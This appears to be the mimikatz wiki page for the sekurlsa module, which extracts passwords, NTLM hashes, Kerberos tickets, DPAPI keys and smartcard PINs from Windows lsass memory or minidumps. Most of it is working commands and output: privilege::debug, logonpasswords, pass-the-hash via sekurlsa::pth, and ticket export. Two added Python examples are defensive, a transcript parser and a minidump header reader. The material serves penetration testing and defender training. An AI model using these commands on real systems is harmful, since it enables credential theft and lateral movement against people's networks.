module ~ sekurlsa

This module extracts passwords, keys, PIN codes and tickets from the memory of `lsass` (Local Security Authority Subsystem Service): the live process by default, or a minidump of it (see howto ~ get passwords by memory dump for instructions on minidumps and other dumps).
When working with the `lsass` process, `mimikatz` needs some rights; choose one:

- Administrator, to get the `debug` privilege via `privilege::debug`
- `SYSTEM` account, via post-exploitation tools, scheduled tasks, `psexec -s` ... in this case the `debug` privilege is not needed.
Without rights to access the `lsass` process, all commands will fail with an error like this: `ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)` (except when working with a minidump).
So, do not hesitate to start with:

```
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # log sekurlsa.log
Using 'sekurlsa.log' for logfile : OK
```

...before other commands 😉
The information that can be extracted depends on the version of Windows and authentication methods: [en] http://1drv.ms/1fCWkhu
Commands: `logonpasswords`, `pth`, `tickets`, `ekeys`, `dpapi`, `minidump`, `process`, `searchpasswords`, `msv`, `wdigest`, `kerberos`, `tspkg`, `livessp`, `ssp`, `credman`
```
mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 88038 (00000000:000157e6)
Session           : Interactive from 1
User Name         : Gentil Kiwi
Domain            : vm-w7-ult
SID               : S-1-5-21-2044528444-627255920-3055224092-1000
    msv :
     [00000003] Primary
     * Username : Gentil Kiwi
     * Domain   : vm-w7-ult
     * LM       : d0e9aee149655a6075e4540af1f22d3b
     * NTLM     : cc36cf7a8514893efccd332446158b1a
     * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
    tspkg :
     * Username : Gentil Kiwi
     * Domain   : vm-w7-ult
     * Password : waza1234/
    wdigest :
     * Username : Gentil Kiwi
     * Domain   : vm-w7-ult
     * Password : waza1234/
    kerberos :
     * Username : Gentil Kiwi
     * Domain   : vm-w7-ult
     * Password : waza1234/
    ssp :
     [00000000]
     * Username : admin
     * Domain   : nas
     * Password : anotherpassword
    credman :
     [00000000]
     * Username : nas\admin
     * Domain   : nas.chocolate.local
     * Password : anotherpassword
```
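As an added example (not part of the mimikatz wiki or code base), here is a Python parser for the `sekurlsa::logonpasswords` layout shown above: a defender running the command in a lab can use it to check, per logon session, which credential providers (`wdigest`, `tspkg`, `credman`, ...) still return a cleartext `Password` rather than `(null)` or hashes only, for instance to confirm that a WDigest hardening change took effect. `SAMPLE_LOG` is a constructed transcript with made-up users and hashes.

```python
# Constructed sample (made-up users and hashes) in the layout of sekurlsa::logonpasswords.
SAMPLE_LOG = """\
Authentication Id : 0 ; 88038 (00000000:000157e6)
User Name         : testuser
Domain            : lab
    msv :
     [00000003] Primary
     * NTLM     : 00112233445566778899aabbccddeeff
    wdigest :
     * Password : (null)
Authentication Id : 0 ; 999 (00000000:000003e7)
User Name         : svc_backup
Domain            : lab
    msv :
     * NTLM     : ffeeddccbbaa99887766554433221100
    wdigest :
     * Password : Summer2014!
    credman :
     [00000000]
     * Password : Another1!
"""
PROVIDERS = ("msv", "tspkg", "wdigest", "kerberos", "ssp", "credman")

def parse_sessions(text):
    """Split a transcript into logon sessions; '* field : value' rows are grouped by provider."""
    sessions, session, provider = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Authentication Id"):       # a new logon session begins
            session = {"user": None, "domain": None, "providers": {}}
            sessions.append(session)
            provider = None
        elif session is None:
            continue
        elif line.startswith("User Name"):
            session["user"] = line.split(":", 1)[1].strip()
        elif line.startswith("Domain"):
            session["domain"] = line.split(":", 1)[1].strip()
        elif line.endswith(":") and line[:-1].strip() in PROVIDERS:   # e.g. "wdigest :"
            provider = line[:-1].strip()
        elif line.startswith("*") and provider:          # e.g. "* Password : (null)"
            field, value = line[1:].split(":", 1)
            session["providers"].setdefault(provider, {})[field.strip()] = value.strip()
    return sessions

def cleartext_exposure(text):
    """Map 'domain\\user' to the providers that still hold a cleartext password (not '(null)')."""
    return {f"{s['domain']}\\{s['user']}": sorted(
                p for p, f in s["providers"].items() if f.get("Password") not in (None, "(null)"))
            for s in parse_sessions(text)}
```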
Pass-The-Hash

`mimikatz` can perform the well-known 'Pass-The-Hash' operation to run a process under other credentials using the NTLM hash of the user's password instead of the real password.

For this, it starts a process with a fake identity, then replaces the fake information (the NTLM hash of the fake password) with the real information (the NTLM hash of the real password).
Arguments:

- `/user` - the username you want to impersonate; keep in mind that Administrator is not the only name for this well-known account.
- `/domain` - the domain name; without a domain, or in the case of a local user/admin, use the computer or server name, `workgroup`, or whatever.
- `/ntlm` - the NTLM hash of the user's password
- `/run` - optional - the command line to run; the default is `cmd`, to have a shell.
```
mimikatz # sekurlsa::pth /user:utilisateur /domain:chocolate /ntlm:8e3a18d453ec2450c321003772d678d5 /run:"cmd /k dir \\win81.chocolate.local\test\flag.txt"
user    : utilisateur
domain  : chocolate
NTLM    : 8e3a18d453ec2450c321003772d678d5
Program : cmd /k dir \\win81.chocolate.local\test\flag.txt
  |  PID  1828
  |  TID  856
  |  LUID 0 ; 3201168 (00000000:0030d890)
  \_ Data copy @ 00000000004A6300 : OK !
```
Remarks:

- This command does not work with minidumps (nonsense);
- it requires elevated privileges (`privilege::debug` or `SYSTEM` account), unlike 'Pass-The-Ticket', which uses one official API.

See also:

- Pass-The-Ticket: `kerberos::ptt`
- Golden Ticket: `kerberos::golden`
```
mimikatz # sekurlsa::tickets /export

Authentication Id : 0 ; 251812 (00000000:0003d7a4)
Session           : Interactive from 1
User Name         : Administrateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-500

         Group 0 - Ticket Granting Service
          [00000000]
           Start/End/MaxRenew: 01/05/2014 13:10:34 ; 01/05/2014 23:10:32 ; 08/05/2014 13:10:32
           Service Name (02) : ldap ; srvcharly.chocolate.local ; @ CHOCOLATE.LOCAL
           Target Name  (02) : ldap ; srvcharly.chocolate.local ; @ CHOCOLATE.LOCAL
           Client Name  (01) : Administrateur ; @ CHOCOLATE.LOCAL
           Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             98 e1 21 96 d0 de cd aa 71 69 4e 90 21 06 32 53 1c 7e d1 0d 41 5c f2 50 33 8e d0 4f b8 81 a5 56
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 4        [...]
           * Saved to file [0;3d7a4]-0-0-40a50000-Administrateur@ldap-srvcharly.chocolate.local.kirbi !
          [00000001]
           Start/End/MaxRenew: 01/05/2014 13:10:33 ; 01/05/2014 23:10:32 ; 08/05/2014 13:10:32
           Service Name (02) : cifs ; srvcharly.chocolate.local ; @ CHOCOLATE.LOCAL
           Target Name  (02) : cifs ; srvcharly.chocolate.local ; @ CHOCOLATE.LOCAL
           Client Name  (01) : Administrateur ; @ CHOCOLATE.LOCAL
           Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             b1 13 48 be 8a 9c 65 97 85 4a ba c6 04 85 4d 32 ca f5 47 5e 35 23 37 9b d7 60 d2 8d fd 96 9b 8c
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 4        [...]
           * Saved to file [0;3d7a4]-0-1-40a50000-Administrateur@cifs-srvcharly.chocolate.local.kirbi !

         Group 1 - Client Ticket ?

         Group 2 - Ticket Granting Ticket
          [00000000]
           Start/End/MaxRenew: 01/05/2014 13:10:32 ; 01/05/2014 23:10:32 ; 08/05/2014 13:10:32
           Service Name (02) : krbtgt ; CHOCOLATE.LOCAL ; @ CHOCOLATE.LOCAL
           Target Name  (02) : krbtgt ; CHOCOLATE.LOCAL ; @ CHOCOLATE.LOCAL
           Client Name  (01) : Administrateur ; @ CHOCOLATE.LOCAL ( CHOCOLATE.LOCAL )
           Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             56 e8 ba b9 8d 12 db d3 b3 e8 2c de 53 e1 a2 74 c7 5b 5a ab 2b 64 81 28 03 b4 8e 05 41 41 6b 6a
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;3d7a4][email protected] !
```
```
mimikatz # sekurlsa::ekeys

Authentication Id : 0 ; 251812 (00000000:0003d7a4)
Session           : Interactive from 1
User Name         : Administrateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-500

         * Key List @ 00AF9CD8
             23 : cc36cf7a8514893efccd332446158b1a
           -133 : cc36cf7a8514893efccd332446158b1a
           -128 : cc36cf7a8514893efccd332446158b1a
             24 : cc36cf7a8514893efccd332446158b1a
           -135 : cc36cf7a8514893efccd332446158b1a
```
```
mimikatz # sekurlsa::dpapi

Authentication Id : 0 ; 251812 (00000000:0003d7a4)
Session           : Interactive from 1
User Name         : Administrateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-500
         [00000000]
         * GUID : {62f69fd3-0a99-4531-bf94-7442fdf1e411}
         * Time : 01/05/2014 13:12:39
         * Key  : 8801bde168af739ab81aa32b79aa0ee4c27cb9c0dc94b6ab0a8516e650b4bdd565110ae1040d3e47add422454d92b307276bebdba7b23b2b2f8005066ede3580
```
```
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 88038 (00000000:000157e6)
Session           : Interactive from 1
User Name         : Gentil Kiwi
Domain            : vm-w7-ult
SID               : S-1-5-21-2044528444-627255920-3055224092-1000
    msv :
     [00000003] Primary
     * Username : Gentil Kiwi
     * Domain   : vm-w7-ult
     * LM       : d0e9aee149655a6075e4540af1f22d3b
     * NTLM     : cc36cf7a8514893efccd332446158b1a
     * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
...
```
Remark:

Dump from | Works on
---|---
NT 5 - x86 | NT 5 - x86
NT 5 - x64 | NT 5 - x64
NT 6 - x86 | NT 6 - x86/x64 (mimikatz x86)
NT 6 - x64 | NT 6 - x64
Some errors:

- `ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->MajorVersion (A) != MIMIKATZ_NT_MAJOR_VERSION (B)`: you are trying to open a minidump from a Windows NT of another major version (NT5 vs NT6).
- `ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (A) != PROCESSOR_ARCHITECTURE_xxx (B)`: you are trying to open a minidump from a Windows NT of another architecture (x86 vs x64).
- `ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)`: the minidump file was not found (check the path).
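Added example, not code from the mimikatz project: a Python reader for the minidump header, stream directory and SystemInfoStream (the `MINIDUMP_HEADER`, `MINIDUMP_DIRECTORY` and `MINIDUMP_SYSTEM_INFO` layouts from dbghelp.h) that reports which NT major version and architecture an `lsass` dump was taken on, and predicts from the table and the first two errors above whether a given mimikatz build (NT major of its host, x86 or x64 build) would open it. `build_minidump` constructs a synthetic dump for testing only; it is not a real `lsass` dump.

```python
import struct

MDMP_SIGNATURE = 0x504D444D          # little-endian 'MDMP'
SYSTEM_INFO_STREAM = 7               # SystemInfoStream in MINIDUMP_STREAM_TYPE
ARCH_NAMES = {0: "x86", 9: "x64"}    # PROCESSOR_ARCHITECTURE_INTEL, PROCESSOR_ARCHITECTURE_AMD64

def dump_origin(data):
    """Return (nt_major_version, arch) of the machine a minidump was taken on."""
    if len(data) < 32 or struct.unpack_from("<I", data, 0)[0] != MDMP_SIGNATURE:
        raise ValueError("not a minidump: bad MDMP signature")
    # MINIDUMP_HEADER: Signature, Version, NumberOfStreams, StreamDirectoryRva,
    # CheckSum, TimeDateStamp (u32 each), Flags (u64) = 32 bytes
    num_streams, dir_rva = struct.unpack_from("<II", data, 8)
    for i in range(num_streams):
        # MINIDUMP_DIRECTORY entry: StreamType, Location.DataSize, Location.Rva (12 bytes)
        stype, _size, rva = struct.unpack_from("<III", data, dir_rva + 12 * i)
        if stype == SYSTEM_INFO_STREAM:
            # MINIDUMP_SYSTEM_INFO: ProcessorArchitecture(u16), ProcessorLevel(u16),
            # ProcessorRevision(u16), NumberOfProcessors(u8), ProductType(u8), MajorVersion(u32), ...
            arch, _, _, _, _, major = struct.unpack_from("<HHHBBI", data, rva)
            return major, ARCH_NAMES.get(arch, f"arch{arch}")
    raise ValueError("minidump has no SystemInfoStream")

def predicted_error(data, mimikatz_nt_major, mimikatz_arch):
    """Return the acquireLSA error text the wiki lists for this dump on that mimikatz build, or None."""
    major, arch = dump_origin(data)
    if major != mimikatz_nt_major:
        return f"Minidump pInfos->MajorVersion ({major}) != MIMIKATZ_NT_MAJOR_VERSION ({mimikatz_nt_major})"
    if arch != mimikatz_arch:
        return f"Minidump pInfos->ProcessorArchitecture ({arch}) != PROCESSOR_ARCHITECTURE ({mimikatz_arch})"
    return None

def build_minidump(major, arch):
    """Constructed minimal minidump (header + one directory entry + system info), for testing only."""
    header = struct.pack("<IIIIIIQ", MDMP_SIGNATURE, 0xA793, 1, 32, 0, 0, 0)    # directory at RVA 32
    sysinfo = struct.pack("<HHHBBIIII", arch, 6, 0, 1, 1, major, 1, 7601, 2)    # up to PlatformId
    directory = struct.pack("<III", SYSTEM_INFO_STREAM, len(sysinfo), 32 + 12)  # sysinfo at RVA 44
    return header + directory + sysinfo

if __name__ == "__main__":
    print(dump_origin(build_minidump(6, 9)))               # (6, 'x64')
    print(predicted_error(build_minidump(6, 0), 6, "x64"))  # architecture mismatch
```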
```
Authentication Id : 0 ; 3518063 (00000000:0035ae6f)
Session           : Unlock from 1
User Name         : Administrateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-500
    msv :
     [00010000] CredentialKeys
     * RootKey  : 2a099891174e2d700d44368255a53a1a0e360471343c1ad580d57989bba09a14
     * DPAPI    : 43d7b788389b67ee3bcac1786f01a75f

Authentication Id : 0 ; 3463053 (00000000:0034d78d)
Session           : Interactive from 2
User Name         : utilisateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-1107
    msv :
     [00010000] CredentialKeys
     * NTLM     : 8e3a18d453ec2450c321003772d678d5
     * SHA1     : 90bbad2741ee9c533eb8eb37f8fb4172b8896ffa
     [00000003] Primary
     * Username : utilisateur
     * Domain   : CHOCOLATE
     * LM       : 00000000000000000000000000000000
     * NTLM     : 8e3a18d453ec2450c321003772d678d5
     * SHA1     : 90bbad2741ee9c533eb8eb37f8fb4172b8896ffa
```
When using smartcard logon on the domain, `lsass` caches the PIN code of the smartcard:

```
mimikatz # sekurlsa::kerberos
[...]
    kerberos :
     * Username : Administrateur
     * Domain   : CHOCOLATE.LOCAL
     * Password : (null)
     * PIN code : 1234
```